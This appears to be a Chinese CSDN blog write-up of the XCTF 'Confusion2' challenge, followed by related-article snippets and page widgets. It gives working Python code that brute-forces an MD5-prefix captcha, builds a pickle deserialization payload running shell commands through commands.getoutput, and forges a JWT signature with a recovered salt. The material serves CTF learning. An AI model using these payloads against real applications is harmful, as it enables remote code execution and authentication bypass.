Confusion2(Python反序列化+JWT)

最新推荐文章于 2025-05-15 17:12:29 发布
最新推荐文章于 2025-05-15 17:12:29 发布
阅读量643 收藏 16
点赞数 19
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81650222/article/details/147927998
版权

题目描述

Alice终于写完了他的网站, 当Alice和我说的时候,我发现有些奇怪的地方.
PS: Alice 说当她cooking的时候喜欢加salts。
hint1. sign = alg(header + payload + SALT).
hint2. Find SALT before Alice finished it.

一暴力破解验证码:

在登录和注册时都需要验证码

substr(md5('验证码'),0,6) === '52a20e'

将验证码进行md5加密,再取前六位,如果等于52a20e,则验证成功

两种破解的方法

(1):python脚本通过暴力枚举的方式尝试找到能生成指定 MD5 哈希前缀的原始字符串

import hashlib
import time
from string import ascii_lowercase, digits
from itertools import product

def crack_md5(target_hash_prefix, charset=ascii_lowercase + digits, max_length=8):
    """
    尝试破解MD5哈希前缀的函数
    
    参数:
    target_hash_prefix (str): 目标MD5哈希的前缀
    charset (str): 字符集,默认为小写字母和数字
    max_length (int): 最大尝试长度,默认为8
    
    返回:
    str: 找到的匹配字符串,如果未找到则返回None
    """
    start_time = time.time()
    prefix_length = len(target_hash_prefix)
    
    for length in range(1, max_length + 1):
        # 生成所有可能的字符组合
        for combination in product(charset, repeat=length):
            test_str = ''.join(combination)
            # 计算MD5哈希值
            md5_hash = hashlib.md5(test_str.encode('utf-8')).hexdigest()
            
            # 检查是否匹配目标前缀
            if md5_hash[:prefix_length] == target_hash_prefix:
                elapsed_time = time.time() - start_time
                print(f"找到匹配! 字符串: '{test_str}', MD5: {md5_hash}, 耗时: {elapsed_time:.2f}秒")
                return test_str
        
        print(f"已完成长度为{length}的所有组合,正在尝试更长的组合...")
    
    elapsed_time = time.time() - start_time
    print(f"未能找到匹配的字符串。搜索了长度从1到{max_length}的所有组合,耗时: {elapsed_time:.2f}秒")
    return None

if __name__ == "__main__":
    # 目标MD5前缀
    target_hash = '8719eb'
    print(f"开始破解MD5前缀: {target_hash}")
    
    # 尝试破解
    result = crack_md5(target_hash)
    
    if result:
        print(f"成功! 原始字符串是: '{result}'")
    else:
        print("失败! 未能找到匹配的字符串。")

 暴力破解的关键:

for combination in product(charset, repeat=length):
            test_str = ''.join(combination)
            # 计算MD5哈希值
            md5_hash = hashlib.md5(test_str.encode('utf-8')).hexdigest()
            
            # 检查是否匹配目标前缀
            if md5_hash[:prefix_length] == target_hash_prefix:
                elapsed_time = time.time() - start_time
                print(f"找到匹配! 字符串: '{test_str}', MD5: {md5_hash}, 耗时: {elapsed_time:.2f}秒")
                return test_str

(2)MCollider爆破验证码

MCollider下载:https://github.com/MartinxMax/MCollider

二BP抓包

用BP抓包会发现:

token=eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0.

eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTc6XCIobHAxXG5WYWRtaW5cbnAyXG5hUydlMTBhZGMzOTQ5YmE1OWFiYmU1NmUwNTdmMjBmODgzZSdcbnAzXG5hLlwiO30ifQ.

ZGE4MWQwMjMxMmE0N2QyYTNmYTg2N2I5OTEzMDNlOGJjMGExNWIxZjA4MTAxNWFlMGIwODczMDIxYmI5Z

这是加密的JWT(JSON Web Token)格式。这种编码通常用于身份验证和信息传输

在数据中有一段(lp1\nVadmin\np2\naS'e10adc3949ba59abbe56e057f20f883e'\np3\na."

漏洞点:

  1. pickle反序列化漏洞

    • Python的pickle模块允许反序列化对象,但反序列化不可信的输入可能导致代码执行漏洞。攻击者可以构造恶意的序列化字符串,使其在反序列化时执行任意代码。

    • 例如,攻击者可以构造一个序列化字符串,使其在反序列化时调用os.system来执行系统命令。

我们可以通过控制这段序列化字符串,在反序列化的时候执行命令拿到flag

import pickle
import commands
import json

class hack(object):
    def __reduce__(self):
        return (commands.getoutput, ('ls', ))

payload = pickle.dumps([hack(),hack()])
data = json.dumps('O:4:"User":2:{s:9:"user_data";s:%d:"%s";}' % (len(payload), payload))[1:-1]

print '{"data":"%s"}' %( data )
# 注意结果需要BASE64编码!
# 结果 {"data":"O:4:\"User\":2:{s:9:\"user_data\";s:59:\"(lp0\nccommands\ngetoutput\np1\n(S'ls'\np2\ntp3\nRp4\nag1\ng3\nRp5\na.\";}"}
# BASE64:eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTk6XCIobHAwXG5jY29tbWFuZHNcbmdldG91dHB1dFxucDFcbihTJ2xzJ1xucDJcbnRwM1xuUnA0XG5hZzFcbmczXG5ScDVcbmEuXCI7fSJ9

三构造签名

我们最后要将token全部替换掉,将上述构造的命令嵌入其中,这时我们需要构造JWT(JSON WEB Token),题目提示sign = alg(header + payload + SALT).alg表示加密

import hashlib

def Get_sign(header,payload,salt):
    return hashlib.sha256(header+'.'+payload+salt).hexdigest()

print Get_sign('eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0',
               'eyJkYXRhIjoiTzo0OlwiVXNlclwiOjI6e3M6OTpcInVzZXJfZGF0YVwiO3M6NTk6XCIobHAwXG5jY29tbWFuZHNcbmdldG91dHB1dFxucDFcbihTJ2xzJ1xucDJcbnRwM1xuUnA0XG5hZzFcbmczXG5ScDVcbmEuXCI7fSJ9',
               '_Y0uW1llN3verKn0w1t_')
# 把0001中LS命令PAYLOAD编码后的值拖到第二个参数里
# 签名结果:08a2ca6809f0c91db71a0bb56444274680b52a64ea9917f2592c9e4d39997a40
#BASE64:MDhhMmNhNjgwOWYwYzkxZGI3MWEwYmI1NjQ0NDI3NDY4MGI1MmE2NGVhOTkxN2YyNTkyYzllNGQzOTk5N2E0MA

获取flag


import pickle
import commands
import json
import hashlib
import base64

CMD = 'ls /opt'

def Get_sign(header,payload,salt):
    return hashlib.sha256(header+'.'+payload+salt).hexdigest()

def base64_url_encode(text):
    return base64.b64encode(text).replace('+', '-').replace('/', '_').replace('=', '')

class hack(object):
    def __reduce__(self):
        return (commands.getoutput, (CMD, ))

salt='_Y0uW1llN3verKn0w1t_'
header = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJzaGEyNTYiLCJraWQiOiIxIn0' # base64
payload = pickle.dumps([hack(),hack()])
payload_data = json.dumps('O:4:"User":2:{s:9:"user_data";s:%d:"%s";}' % (len(payload), payload))[1:-1]
payload = base64_url_encode('{"data":"%s"}' %( payload_data )) # base64
signature = base64_url_encode(Get_sign(header,payload,salt)) # base64
print header+'.'+payload+'.'+signature

 

攻防世界 web高手进阶区 10分题Confusion2
闵行小鱼塘
10-13 1162
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Confusion2的writeup
攻防世界--Confusion2
qq_46263951的博客
01-16 1082
这个题是Confusion1的延续,所以根据题目提示,先在1中把salt文件内容先读出来 _Y0uW1llN3verKn0w1t_ 这里开放了register和login,注册并登陆 关于md5值爆破,我比较习惯使用数字来爆破,效率比较高一下 <?php $i=0; for ($i;$i<=9999999999999999;$i++) { if (substr(md5($i), 0, 6) == '7358dd') { echo($i); exi
[网络安全] [MCollider] XCTF Confusion2 靶场详解 难度:10星
04-19 315
题目本身存在难度的,该题考了JWTPython反序列化,其中分支就包含了python的经典类和新式类的知识点,官方给的WP资源少并且又过于难以理解,所以另一种方式刨析了一遍。
超全汇总!机器学习常用术语词汇表
SeizeeveryDay的博客
11-24 898
刚接触机器学习框架 TensorFlow 的新手们,这篇由 Google 官方出品的常用术语词汇表,一定是你必不可少的入门资料!本术语表列出了基本的机器学习术语和 TensorFlow ...
【机器学习基础】超全汇总!机器学习常用术语词汇表(建议收藏)
fengdu78的博客
11-12 2536
刚接触机器学习框架 TensorFlow 的新手们,这篇由 Google 官方出品的常用术语词汇表,一定是你必不可少的入门资料!本术语表列出了基本的机器学习术语和 TensorFlow ...
Web QCTF-WrtieUp-2018
大方子
08-20 2563
========================================= 个人收获: 1.php是弱类型语言  xx==xx 或者xx===xx存在被绕过可能 2.python 和404   要想到Flask jinja injection(SSTI) 3.python序列化后的格式类似于: a:5:{s:4:"name";s:6:"张三";s:3:"age";s:2:"22...
一大波学习内容!
weixin_30868855的博客
11-22 802
Dubbo-大波-服务化框架 dubbo_百度搜索Dubbo与Zookeeper、SpringMVC整合和使用(负载均衡、容错) - 好库文摘User Guide-zh - Dubbo - Alibaba Open SesameUser Guide-zh - Dubbo - Alibaba Open Sesame简单之美 | Dubbo架构设计详解DUBBO Hprose RPC框架 ...
【Other】最近在研究的, Java/Springboot/RPC/JPA等
weixin_33774308的博客
04-19 1124
我的Springboot框架,欢迎关注: https://github.com/junneyang/common-web-starter     Dubbo-大波-服务化框架   dubbo_百度搜索Dubbo与Zookeeper、SpringMVC整合和使用(负载均衡、容错) - 好库文摘User Guide-zh - Dubbo - Alibaba Open SesameUser Gui...
面试基础知识准备
qq_37956465的博客
04-26 307
超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息,HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此,HTTP协议不适合传输一些敏感信息,比如:信用卡号、密码等支付信息。
Python在医疗决策支持系统中的数据分析方法
Python作为一种多用途的编程语言,近年来在医疗数据分析领域发挥了巨大的作用。本章将探讨Python在这一领域的作用及其重要性。 ## 1.1 Python作为一种工具的普遍性和灵活性 Python的广泛使用得益于其简洁的语法、...
排查服务器内存空间预警思路
weixin_46228563的博客
05-12 443
这是导致根分区空间不足的根本原因。MySQL 数据文件过大需要针对性处理。如果存在 /var/lib/mysql,可能是数据库文件过大。从您的排查结果可以明确看出,/var/lib/mysql。
.NET 无侵入自动化探针原理与主流实现详解
2401_82505179的博客
05-15 661
本文深入探讨了.NET无侵入自动化探针技术的原理、主流工具的实现方式及其在实际项目中的应用。通过CLRProfilingAPI、CLRInstrumentation、反射和动态代理等技术,开发者可以在不修改应用程序代码的情况下,实时监控其运行状态和性能指标。文章详细介绍了这些技术的核心机制,并提供了示例代码。此外,分析了主流APM工具如AppDynamics、NewRelic和OpenTelemetry的实现原理,并通过具体案例展示了如何基于DiagnosticSource、动态代理和IL操作实现性能监控、
监控易运维管理软件:架构稳健,组件强大
MXsoft618的博客
05-12 543
在当今的信息化时代,运维管理对于企业的稳定运营至关重要。一款好的运维管理软件,不仅能够帮助企业高效管理IT基础设施,还能提升运维效率,降低运维成本。今天,我要给大家介绍的,就是我们公司自主研发的监控易运维管理软件,它以其稳健的系统架构和强大的核心组件,成为了众多企业运维管理的首选。
MySQL读写分离
最新发布
2501_91344113的博客
05-15 731
在slave1和2上查询不到,在master上才能查看到这条语句内容,说明写操作在master服务器上,由此验证,已经实现了mysql读写分离,目前所有的操作都全部在master主服务器上,用来避免数据的不同步,所有的读操作都分摊给了slave从服务器,用来分担数据库的压力。简单来说,读写分离就是只在主服务器上写,只在从服务器上读。不过,无论是哪种存储方式,在最终用户看,MyCAT里都是一个传统的数据库表,支持标准的 SQL,语句进行数据的操作,这样,对前端业务系统来说可以大幅降低开发难度,提升开发速度。
MySQL存储过程
2302_81352523的博客
05-11 1011
存储过程就是将sql操作进行集合,方便用户的调用和服用。
互联网大厂Java求职面试:电商商品推荐系统中的AI技术应用
在未来等你的专栏
05-11 861
面试官:“回家等通知吧。郑薪苦希望下次见面是在工位上!JVM调优:合理配置堆内存和GC策略能够显著提升系统吞吐量。Spring AI:简化了AI模型的集成流程,适合快速开发。向量数据库:解决了传统SQL无法高效处理语义搜索的问题。
深入解析MySQL联合查询(UNION):案例与实战技巧
码上飞扬的博客
05-12 901
联合查询(UNION)是指将多个SELECT查询的结果合并成一个结果集。在进行联合查询时,所有的SELECT查询返回的列数、数据类型必须一致。UNION和UNION ALL。UNION:返回唯一的记录,自动去除重复的行。UNION ALL:返回所有记录,包括重复的行。
pg_basbackup备份与恢复
HighGO
05-15 515
r, --max-rate=RATE 传输数据目录的最大传输速率(以 kB/s 为单位,或使用后缀“k”或“M”)-F, --format=p|t 输出格式(plain,直接拷贝数据文件,tar 配合 -z -Z 进行打包压缩)-X, --wal-method=none|fetch|stream 包含指定方法所需的 WAL 文件。-s, --status-interval=状态包发送到服务器的间隔时间(以秒为单位)-Z, --compress=0-9 使用给定的压缩级别压缩 tar 输出。
数据库MySQL学习——day11(高级连接与数据库规范化)
blackA_的博客
05-15 644
消除数据冗余(重复)避免插入、删除、更新异常提高数据一致性和存储效率连接类型说明SELF JOIN表自己连接自己CROSS JOIN两表所有组合(笛卡尔积)范式原则1NF每列值必须是原子值(不能有逗号分隔)2NF消除部分依赖(非主属性依赖主键全部)3NF消除传递依赖(非主属性不依赖其他非主属性)
Python代码实现hog+svm的MNIST手写数字识别
12-26
### Python HOG+SVM MNIST 手写数字识别 示例代码 对于手写数字识别的任务,HOG(Histogram of Oriented Gradients)特征提取方法与支持向量机(SVM)相结合是一种常见的方式。下面展示一段完整的Python代码来实现这一过程。 #### 导入必要的库 ```python import numpy as np from skimage.feature import hog from sklearn.datasets import fetch_openml from sklearn.model_selection import train_test_split from sklearn.preprocessing import StandardScaler from sklearn.svm import SVC from sklearn.metrics import accuracy_score, confusion_matrix import matplotlib.pyplot as plt ``` #### 加载并预处理数据集 ```python mnist = fetch_openml('mnist_784', version=1) X, y = mnist["data"], mnist["target"].astype(np.int8) # 数据标准化 scaler = StandardScaler() X_scaled = scaler.fit_transform(X) # 划分训练集和测试集 X_train, X_test, y_train, y_test = train_test_split( X_scaled, y, test_size=0.2, random_state=42) ``` #### 提取HOG特征 ```python hog_features_train = [] for image in X_train.reshape(-1, 28, 28): fd = hog(image, orientations=9, pixels_per_cell=(14, 14), cells_per_block=(1, 1), visualize=False) hog_features_train.append(fd) hog_features_train = np.array(hog_features_train) hog_features_test = [] for image in X_test.reshape(-1, 28, 28): fd = hog(image, orientations=9, pixels_per_cell=(14, 14), cells_per_block=(1, 1), visualize=False) hog_features_test.append(fd) hog_features_test = np.array(hog_features_test) ``` #### 训练SVM模型 ```python clf = SVC(kernel='linear') clf.fit(hog_features_train, y_train) ``` #### 测试模型性能 ```python predictions = clf.predict(hog_features_test) print(f'Accuracy: {accuracy_score(y_test, predictions)}') confusion_mat = confusion_matrix(y_test, predictions) plt.imshow(confusion_mat, interpolation='nearest', cmap=plt.cm.Blues) plt.title("Confusion matrix") plt.colorbar() tick_marks = np.arange(10) plt.xticks(tick_marks, range(10)) plt.yticks(tick_marks, range(10)) plt.ylabel('True label') plt.xlabel('Predicted label') plt.show() ``` 上述代码实现了利用HOG+SVM对手写数字进行分类的过程[^3]。通过这种方式可以获得较高的准确性,并且能够直观地查看混淆矩阵了解不同类别的预测情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值